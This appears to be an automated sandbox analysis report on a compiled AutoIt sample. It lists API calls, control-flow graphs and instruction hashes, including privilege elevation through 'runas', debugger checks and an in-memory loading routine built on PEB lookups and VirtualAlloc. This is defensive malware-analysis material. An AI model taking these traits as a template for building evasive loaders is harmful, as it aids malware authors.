36f4ea 48 API calls 95465->95466 95467 39c00e 95466->95467 95468 3547b7 48 API calls 95467->95468 95469 39c018 95468->95469 95470 39bdb4 GetSystemTimeAsFileTime 95469->95470 95471 39c023 95470->95471 95472 354517 83 API calls 95471->95472 95473 39c036 _wcscmp 95472->95473 95474 39c05a 95473->95474 95475 39c107 95473->95475 95476 39c56d 94 API calls 95474->95476 95477 39c56d 94 API calls 95475->95477 95478 39c05f 95476->95478 95479 39c0d3 _wcscat 95477->95479 95480 371dfc __wsplitpath 47 API calls 95478->95480 95482 39c110 95478->95482 95481 3544ed 64 API calls 95479->95481 95479->95482 95485 39c088 _wcscat _wcscpy 95480->95485 95483 39c12c 95481->95483 95482->95448 95484 3544ed 64 API calls 95483->95484 95486 39c13c 95484->95486 95488 371dfc __wsplitpath 47 API calls 95485->95488 95487 3544ed 64 
API calls 95486->95487 95489 39c157 95487->95489 95488->95479 95490 3544ed 64 API calls 95489->95490 95491 39c167 95490->95491 95492 3544ed 64 API calls 95491->95492 95493 39c182 95492->95493 95494 3544ed 64 API calls 95493->95494 95495 39c192 95494->95495 95496 3544ed 64 API calls 95495->95496 95497 39c1a2 95496->95497 95498 3544ed 64 API calls 95497->95498 95499 39c1b2 95498->95499 95522 39c71a GetTempPathW GetTempFileNameW 95499->95522 95501 39c1be 95502 373499 117 API calls 95501->95502 95513 39c1cf 95502->95513 95503 39c289 95504 3735e4 __fcloseall 83 API calls 95503->95504 95505 39c294 95504->95505 95507 39c29a DeleteFileW 95505->95507 95508 39c2ae 95505->95508 95506 3544ed 64 API calls 95506->95513 95507->95482 95509 39c342 CopyFileW 95508->95509 95514 39c2b8 95508->95514 95510 39c358 DeleteFileW 95509->95510 95511 39c36a DeleteFileW 95509->95511 95510->95482 95536 39c6d9 CreateFileW 95511->95536 95513->95482 95513->95503 95513->95506 95523 372aae 95513->95523 95516 39b965 118 API calls 95514->95516 95517 39c32d 95516->95517 95517->95511 95518 39c331 DeleteFileW 95517->95518 95518->95482 95519->95411 95520->95434 95521->95439 95522->95501 95524 372aba _fseek 95523->95524 95525 372ad4 95524->95525 95526 372aec 95524->95526 95527 372ae4 _fseek 95524->95527 95551 377c0e 47 API calls __getptd_noexit 95525->95551 95528 374e1c __lock_file 48 API calls 95526->95528 95527->95513 95531 372af2 95528->95531 95530 372ad9 95552 376e10 8 API calls _fseek 95530->95552 95539 372957 95531->95539 95537 39c6ff SetFileTime CloseHandle 95536->95537 95538 39c715 95536->95538 95537->95538 95538->95482 95540 372966 95539->95540 95545 372984 95539->95545 95541 372974 95540->95541 95540->95545 95549 37299c ___crtGetEnvironmentStringsW 95540->95549 95554 377c0e 47 API calls __getptd_noexit 95541->95554 95543 372979 95555 376e10 8 API calls _fseek 95543->95555 95553 372b24 LeaveCriticalSection LeaveCriticalSection _fseek 95545->95553 95547 372c84 __flush 78 API calls 95547->95549 95548 
372933 __flush 47 API calls 95548->95549 95549->95545 95549->95547 95549->95548 95550 37af61 __flush 78 API calls 95549->95550 95556 378e63 78 API calls 6 library calls 95549->95556 95550->95549 95551->95530 95552->95527 95553->95527 95554->95543 95555->95545 95556->95549 95557 fd9493 95560 fd9108 95557->95560 95559 fd94df 95561 fd6b38 GetPEB 95560->95561 95564 fd91a7 95561->95564 95563 fd91d8 CreateFileW 95563->95564 95567 fd91e5 95563->95567 95565 fd9201 VirtualAlloc 95564->95565 95564->95567 95571 fd9308 CloseHandle 95564->95571 95572 fd9318 VirtualFree 95564->95572 95573 fda018 GetPEB 95564->95573 95566 fd9222 ReadFile 95565->95566 95565->95567 95566->95567 95570 fd9240 VirtualAlloc 95566->95570 95568 fd93f4 VirtualFree 95567->95568 95569 fd9402 95567->95569 95568->95569 95569->95559 95570->95564 95570->95567 95571->95564 95572->95564 95574 fda042 95573->95574 95574->95563

                                                                  Control-flow Graph

                                                                  control_flow_graph 644 37b043-37b080 call 37f8a0 647 37b082-37b084 644->647 648 37b089-37b08b 644->648 649 37b860-37b86c call 37a70c 647->649 650 37b08d-37b0a7 call 377bda call 377c0e call 376e10 648->650 651 37b0ac-37b0d9 648->651 650->649 652 37b0e0-37b0e7 651->652 653 37b0db-37b0de 651->653 657 37b105 652->657 658 37b0e9-37b100 call 377bda call 377c0e call 376e10 652->658 653->652 656 37b10b-37b110 653->656 662 37b112-37b11c call 37f82f 656->662 663 37b11f-37b12d call 383bf2 656->663 657->656 693 37b851-37b854 658->693 662->663 674 37b133-37b145 663->674 675 37b44b-37b45d 663->675 674->675 677 37b14b-37b183 call 377a0d GetConsoleMode 674->677 678 37b463-37b473 675->678 679 37b7b8-37b7d5 WriteFile 675->679 677->675 698 37b189-37b18f 677->698 684 37b55a-37b55f 678->684 685 37b479-37b484 678->685 681 37b7d7-37b7df 679->681 682 37b7e1-37b7e7 GetLastError 679->682 687 37b7e9 681->687 682->687 688 37b565-37b56e 684->688 689 37b663-37b66e 684->689 691 37b81b-37b833 685->691 692 37b48a-37b49a 685->692 695 37b7ef-37b7f1 687->695 688->691 696 37b574 688->696 689->691 694 37b674 689->694 700 37b835-37b838 691->700 701 37b83e-37b84e call 377c0e call 377bda 691->701 699 37b4a0-37b4a3 692->699 697 37b85e-37b85f 693->697 703 37b67e-37b693 694->703 705 37b856-37b85c 695->705 706 37b7f3-37b7f5 695->706 707 37b57e-37b595 696->707 697->649 708 37b191-37b193 698->708 709 37b199-37b1bc GetConsoleCP 698->709 710 37b4a5-37b4be 699->710 711 37b4e9-37b520 WriteFile 699->711 700->701 702 37b83a-37b83c 700->702 701->693 702->697 713 37b699-37b69b 703->713 705->697 706->691 715 37b7f7-37b7fc 706->715 716 37b59b-37b59e 707->716 708->675 708->709 717 37b1c2-37b1ca 709->717 718 37b440-37b446 709->718 719 37b4c0-37b4ca 710->719 720 37b4cb-37b4e7 710->720 711->682 712 37b526-37b538 711->712 712->695 721 37b53e-37b54f 712->721 722 37b69d-37b6b3 713->722 723 37b6d8-37b719 WideCharToMultiByte 713->723 725 37b812-37b819 call 377bed 
715->725 726 37b7fe-37b810 call 377c0e call 377bda 715->726 727 37b5a0-37b5b6 716->727 728 37b5de-37b627 WriteFile 716->728 729 37b1d4-37b1d6 717->729 718->706 719->720 720->699 720->711 721->692 730 37b555 721->730 731 37b6c7-37b6d6 722->731 732 37b6b5-37b6c4 722->732 723->682 734 37b71f-37b721 723->734 725->693 726->693 736 37b5cd-37b5dc 727->736 737 37b5b8-37b5ca 727->737 728->682 739 37b62d-37b645 728->739 740 37b1dc-37b1fe 729->740 741 37b36b-37b36e 729->741 730->695 731->713 731->723 732->731 744 37b727-37b75a WriteFile 734->744 736->716 736->728 737->736 739->695 747 37b64b-37b658 739->747 748 37b217-37b223 call 371688 740->748 749 37b200-37b215 740->749 742 37b375-37b3a2 741->742 743 37b370-37b373 741->743 752 37b3a8-37b3ab 742->752 743->742 743->752 753 37b75c-37b776 744->753 754 37b77a-37b78e GetLastError 744->754 747->707 756 37b65e 747->756 764 37b225-37b239 748->764 765 37b269-37b26b 748->765 750 37b271-37b283 call 3840f7 749->750 774 37b435-37b43b 750->774 775 37b289 750->775 758 37b3b2-37b3c5 call 385884 752->758 759 37b3ad-37b3b0 752->759 753->744 761 37b778 753->761 763 37b794-37b796 754->763 756->695 758->682 778 37b3cb-37b3d5 758->778 759->758 766 37b407-37b40a 759->766 761->763 763->687 769 37b798-37b7b0 763->769 771 37b412-37b42d 764->771 772 37b23f-37b254 call 3840f7 764->772 765->750 766->729 770 37b410 766->770 769->703 776 37b7b6 769->776 770->774 771->774 772->774 784 37b25a-37b267 772->784 774->687 779 37b28f-37b2c4 WideCharToMultiByte 775->779 776->695 781 37b3d7-37b3ee call 385884 778->781 782 37b3fb-37b401 778->782 779->774 783 37b2ca-37b2f0 WriteFile 779->783 781->682 789 37b3f4-37b3f5 781->789 782->766 783->682 786 37b2f6-37b30e 783->786 784->779 786->774 787 37b314-37b31b 786->787 787->782 790 37b321-37b34c WriteFile 787->790 789->782 790->682 791 37b352-37b359 790->791 791->774 792 37b35f-37b366 791->792 792->782
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4af47addcbf98cf2223402fc8d83709088f73408ec02e1827d430e98e789301b
                                                                  • Instruction ID: c1c9dc6b1662df85b5d8c6052406b7638276f2c371c577d38b5d8c1aa4f4bb6c
                                                                  • Opcode Fuzzy Hash: 4af47addcbf98cf2223402fc8d83709088f73408ec02e1827d430e98e789301b
                                                                  • Instruction Fuzzy Hash: 20324B75A022698BDB368F14DC817E9B7B9FF46310F5980D9E40EA7A81D7349E80CF52

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00353AA3,?), ref: 00353D45
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00353AA3,?), ref: 00353D57
                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00411148,00411130,?,?,?,?,00353AA3,?), ref: 00353DC8
                                                                    • Part of subcall function 00356430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00353DEE,00411148,?,?,?,?,?,00353AA3,?), ref: 00356471
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00353AA3,?), ref: 00353E48
                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004028F4,00000010), ref: 003C1CCE
                                                                  • SetCurrentDirectoryW.KERNEL32(?,00411148,?,?,?,?,?,00353AA3,?), ref: 003C1D06
                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003EDAB4,00411148,?,?,?,?,?,00353AA3,?), ref: 003C1D89
                                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00353AA3), ref: 003C1D90
                                                                    • Part of subcall function 00353E6E: GetSysColorBrush.USER32(0000000F), ref: 00353E79
                                                                    • Part of subcall function 00353E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00353E88
                                                                    • Part of subcall function 00353E6E: LoadIconW.USER32(00000063), ref: 00353E9E
                                                                    • Part of subcall function 00353E6E: LoadIconW.USER32(000000A4), ref: 00353EB0
                                                                    • Part of subcall function 00353E6E: LoadIconW.USER32(000000A2), ref: 00353EC2
                                                                    • Part of subcall function 00353E6E: RegisterClassExW.USER32(?), ref: 00353F30
                                                                    • Part of subcall function 003536B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003536E6
                                                                    • Part of subcall function 003536B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00353707
                                                                    • Part of subcall function 003536B8: ShowWindow.USER32(00000000,?,?,?,?,00353AA3,?), ref: 0035371B
                                                                    • Part of subcall function 003536B8: ShowWindow.USER32(00000000,?,?,?,?,00353AA3,?), ref: 00353724
                                                                    • Part of subcall function 00354FFC: _memset.LIBCMT ref: 00355022
                                                                    • Part of subcall function 00354FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003550CB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                  • String ID: ()@$This is a third-party compiled AutoIt script.$runas
                                                                  • API String ID: 438480954-3604860743
                                                                  • Opcode ID: 408171e05e26f617db1e906021c5a97fc2fecdd64c0db8d9d0f43132186ef5db
                                                                  • Instruction ID: 7d1e8e8f5338ee9a65dcb1cdd00912372889e6a683d9bb609bdcabe00d769ebf
                                                                  • Opcode Fuzzy Hash: 408171e05e26f617db1e906021c5a97fc2fecdd64c0db8d9d0f43132186ef5db
                                                                  • Instruction Fuzzy Hash: DF512A31A04244BECF13ABB0DC46EEDBB799B09745F008079FA41AB1B2DB745A4DC725

Control-flow Graph
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 0036DDEC
                                                                  • GetCurrentProcess.KERNEL32(00000000,003EDC38,?,?), ref: 0036DEAC
                                                                  • GetNativeSystemInfo.KERNELBASE(?,003EDC38,?,?), ref: 0036DF01
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0036DF0C
                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0036DF1F
                                                                  • GetSystemInfo.KERNEL32(?,003EDC38,?,?), ref: 0036DF29
                                                                  • GetSystemInfo.KERNEL32(?,003EDC38,?,?), ref: 0036DF35
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                  • String ID:
                                                                  • API String ID: 3851250370-0
                                                                  • Opcode ID: e8e234b26e1465b5f3079c013b3575879009e7b08eb88caa003b58cfc144479d
                                                                  • Instruction ID: cd9f045562e10034cfc2f65e2be3f9fb789ba27a77178c21232098f20b0f44bc
                                                                  • Opcode Fuzzy Hash: e8e234b26e1465b5f3079c013b3575879009e7b08eb88caa003b58cfc144479d
                                                                  • Instruction Fuzzy Hash: 98618271D0A284DBCF16CF6894C15EA7FB4AF29300F1A85D9D8459F24BC625C909CB65

Control-flow Graph
                                                                  APIs
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0035449E,?,?,00000000,00000001), ref: 0035407B
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0035449E,?,?,00000000,00000001), ref: 00354092
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,0035449E,?,?,00000000,00000001,?,?,?,?,?,?,003541FB), ref: 003C4F1A
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,0035449E,?,?,00000000,00000001,?,?,?,?,?,?,003541FB), ref: 003C4F2F
                                                                  • LockResource.KERNEL32(0035449E,?,?,0035449E,?,?,00000000,00000001,?,?,?,?,?,?,003541FB,00000000), ref: 003C4F42
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: c46ca539a7d76d07ed4d48b61c7793a7b9a5e5a14c884bd4aa42c8e73ddd11c8
                                                                  • Instruction ID: 8f8dbc51ba51bb661091dd64fcb3213844a700b1a703635a260cb07333992406
                                                                  • Opcode Fuzzy Hash: c46ca539a7d76d07ed4d48b61c7793a7b9a5e5a14c884bd4aa42c8e73ddd11c8
                                                                  • Instruction Fuzzy Hash: 69115E70200705AFE7268B66EC48F27BBBDEBC5B55F20452DFA02872A0DA71DC448A20
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,003C2F49), ref: 00396CB9
                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00396CCA
                                                                  • FindClose.KERNEL32(00000000), ref: 00396CDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: 78be62ef516e577292eb257b198b552530e12ca4a35cae3ffe32294110cea6e9
                                                                  • Instruction ID: 064159bc7d4bbed24a36c8122e8931f0be7e04708580c4f1abc50ef0618eba4e
                                                                  • Opcode Fuzzy Hash: 78be62ef516e577292eb257b198b552530e12ca4a35cae3ffe32294110cea6e9
                                                                  • Instruction Fuzzy Hash: C1E04F32816515AB86226738FC0E8EA77ACEA06339F104716F976C21E0EB70DD448AD6
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0035E959
                                                                  • timeGetTime.WINMM ref: 0035EBFA
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0035ED2E
                                                                  • TranslateMessage.USER32(?), ref: 0035ED3F
                                                                  • DispatchMessageW.USER32(?), ref: 0035ED4A
                                                                  • LockWindowUpdate.USER32(00000000), ref: 0035ED79
                                                                  • DestroyWindow.USER32 ref: 0035ED85
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035ED9F
                                                                  • Sleep.KERNEL32(0000000A), ref: 003C5270
                                                                  • TranslateMessage.USER32(?), ref: 003C59F7
                                                                  • DispatchMessageW.USER32(?), ref: 003C5A05
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003C5A19
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                  • API String ID: 2641332412-570651680
                                                                  • Opcode ID: ba7f6823281e2c38de42a4e43ee24a242e741e25fab335e47826d100537a925c
                                                                  • Instruction ID: 497fc0ab039bf22ed45c16f9ea70cb04390b092182fdcf12e7592cbd93de4a1f
                                                                  • Opcode Fuzzy Hash: ba7f6823281e2c38de42a4e43ee24a242e741e25fab335e47826d100537a925c
                                                                  • Instruction Fuzzy Hash: CC62A070508340DFDB2ADF24C885FAA77E8BF44305F05496DED468B2A2DB75E988CB52
                                                                  APIs
                                                                  • ___createFile.LIBCMT ref: 00385EC3
                                                                  • ___createFile.LIBCMT ref: 00385F04
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00385F2D
                                                                  • __dosmaperr.LIBCMT ref: 00385F34
                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00385F47
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00385F6A
                                                                  • __dosmaperr.LIBCMT ref: 00385F73
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00385F7C
                                                                  • __set_osfhnd.LIBCMT ref: 00385FAC
                                                                  • __lseeki64_nolock.LIBCMT ref: 00386016
                                                                  • __close_nolock.LIBCMT ref: 0038603C
                                                                  • __chsize_nolock.LIBCMT ref: 0038606C
                                                                  • __lseeki64_nolock.LIBCMT ref: 0038607E
                                                                  • __lseeki64_nolock.LIBCMT ref: 00386176
                                                                  • __lseeki64_nolock.LIBCMT ref: 0038618B
                                                                  • __close_nolock.LIBCMT ref: 003861EB
                                                                    • Part of subcall function 0037EA9C: CloseHandle.KERNELBASE(00000000,003FEEF4,00000000,?,00386041,003FEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0037EAEC
                                                                    • Part of subcall function 0037EA9C: GetLastError.KERNEL32(?,00386041,003FEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0037EAF6
                                                                    • Part of subcall function 0037EA9C: __free_osfhnd.LIBCMT ref: 0037EB03
                                                                    • Part of subcall function 0037EA9C: __dosmaperr.LIBCMT ref: 0037EB25
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • __lseeki64_nolock.LIBCMT ref: 0038620D
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00386342
                                                                  • ___createFile.LIBCMT ref: 00386361
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0038636E
                                                                  • __dosmaperr.LIBCMT ref: 00386375
                                                                  • __free_osfhnd.LIBCMT ref: 00386395
                                                                  • __invoke_watson.LIBCMT ref: 003863C3
                                                                  • __wsopen_helper.LIBCMT ref: 003863DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                  • String ID: @
                                                                  • API String ID: 3896587723-2766056989
                                                                  • Opcode ID: 20f66fe1d5d6fa5b6fface9343e4b10fa804fcfcd20741f4a9000df220216af4
                                                                  • Instruction ID: b9d44579d7b8e2404b8e9acde84f35311187678053bd26ec93757f9d8f2d9822
                                                                  • Opcode Fuzzy Hash: 20f66fe1d5d6fa5b6fface9343e4b10fa804fcfcd20741f4a9000df220216af4
                                                                  • Instruction Fuzzy Hash: 5922587190470A9FEF27AF68DC56BFD7B61EB14310F2582A8E9219B2E2C3398D40C751

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _wcscpy.LIBCMT ref: 0039FA96
                                                                  • _wcschr.LIBCMT ref: 0039FAA4
                                                                  • _wcscpy.LIBCMT ref: 0039FABB
                                                                  • _wcscat.LIBCMT ref: 0039FACA
                                                                  • _wcscat.LIBCMT ref: 0039FAE8
                                                                  • _wcscpy.LIBCMT ref: 0039FB09
                                                                  • __wsplitpath.LIBCMT ref: 0039FBE6
                                                                  • _wcscpy.LIBCMT ref: 0039FC0B
                                                                  • _wcscpy.LIBCMT ref: 0039FC1D
                                                                  • _wcscpy.LIBCMT ref: 0039FC32
                                                                  • _wcscat.LIBCMT ref: 0039FC47
                                                                  • _wcscat.LIBCMT ref: 0039FC59
                                                                  • _wcscat.LIBCMT ref: 0039FC6E
                                                                    • Part of subcall function 0039BFA4: _wcscmp.LIBCMT ref: 0039C03E
                                                                    • Part of subcall function 0039BFA4: __wsplitpath.LIBCMT ref: 0039C083
                                                                    • Part of subcall function 0039BFA4: _wcscpy.LIBCMT ref: 0039C096
                                                                    • Part of subcall function 0039BFA4: _wcscat.LIBCMT ref: 0039C0A9
                                                                    • Part of subcall function 0039BFA4: __wsplitpath.LIBCMT ref: 0039C0CE
                                                                    • Part of subcall function 0039BFA4: _wcscat.LIBCMT ref: 0039C0E4
                                                                    • Part of subcall function 0039BFA4: _wcscat.LIBCMT ref: 0039C0F7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$t2@
                                                                  • API String ID: 2955681530-4206106489
                                                                  • Opcode ID: 52a9dc67a303e1ed9aad48db3c34dbe829c10c5034323cd2d413fa4cee84c587
                                                                  • Instruction ID: 61172041b564f5a9ab60069a9e28436686e06774d7e2ec680f220ac60d92d809
                                                                  • Opcode Fuzzy Hash: 52a9dc67a303e1ed9aad48db3c34dbe829c10c5034323cd2d413fa4cee84c587
                                                                  • Instruction Fuzzy Hash: 48919072504705EFDF26EF54C851F9AB3E8BF44310F048869F9599B2A1DB34EA48CB92

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00353F86
                                                                  • RegisterClassExW.USER32(00000030), ref: 00353FB0
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00353FC1
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00353FDE
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00353FEE
                                                                  • LoadIconW.USER32(000000A9), ref: 00354004
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00354013
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
